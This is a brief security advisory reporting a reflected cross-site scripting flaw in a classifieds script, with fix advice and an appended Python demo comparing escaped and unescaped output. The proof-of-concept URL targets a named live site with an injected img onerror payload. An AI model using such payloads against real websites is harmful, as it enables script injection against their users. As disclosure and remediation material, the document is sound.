*Vendor:* http://www.yourownclassifieds.com
*Description:*
Your own classified software is a script that helps you create your own
store.
*Discovered by: Rafay Baloch*
Vulnerability: Non-persistent XSS
The script fails to sanitize input entered into the text box,
resulting in XSS.
*POC*:
http://www.gumtreeclone.com/cat-search/for-sales-2/XSS
http://www.gumtreeclone.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E
*Fix*:
- All input generated at any point inside the application should be
HTML-encoded and filtered/sanitized before it is copied to the
application response.
- All HTML special characters should be replaced with their corresponding
HTML entities.
--
Warm Regards,
Rafay Baloch
http://rafayhackingarticles.net
http://techlotips.com
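
Added example, not part of the original advisory: the PoC path segment above is reflected into a hypothetical template with and without the entity replacement the Fix section calls for, and the output is parsed to check whether any injected tag or event handler survives. The template, the function names and the choice of Python are assumptions; the advisory does not show the application's markup or language.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# PoC path segment copied from the advisory (still URL-encoded).
POC_SEGMENT = "%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E"

# Hypothetical template: the search term is echoed into a double-quoted
# attribute and into element text. The real page markup is not in the advisory.
TEMPLATE = '<input type="text" name="q" value="{term}"><p>Results for {term}</p>'


def render_vulnerable(segment):
    """Reflects the decoded path segment unchanged (the reported behaviour)."""
    return TEMPLATE.format(term=unquote(segment))


def render_fixed(segment):
    """Replaces & < > " ' with entities before the value reaches the response."""
    return TEMPLATE.format(term=html.escape(unquote(segment), quote=True))


class TagAudit(HTMLParser):
    """Records every start tag and any on* event-handler attribute names."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def audit(markup):
    """Returns (start tags, event-handler attributes) found in the markup."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.handlers


if __name__ == "__main__":
    for render in (render_vulnerable, render_fixed):
        tags, handlers = audit(render(POC_SEGMENT))
        print(f"{render.__name__}: tags={tags} handlers={handlers}")
```

Encoding the double quote matters here: the PoC starts with `">`, so an encoder that leaves quotes alone would still let the value close a quoted attribute.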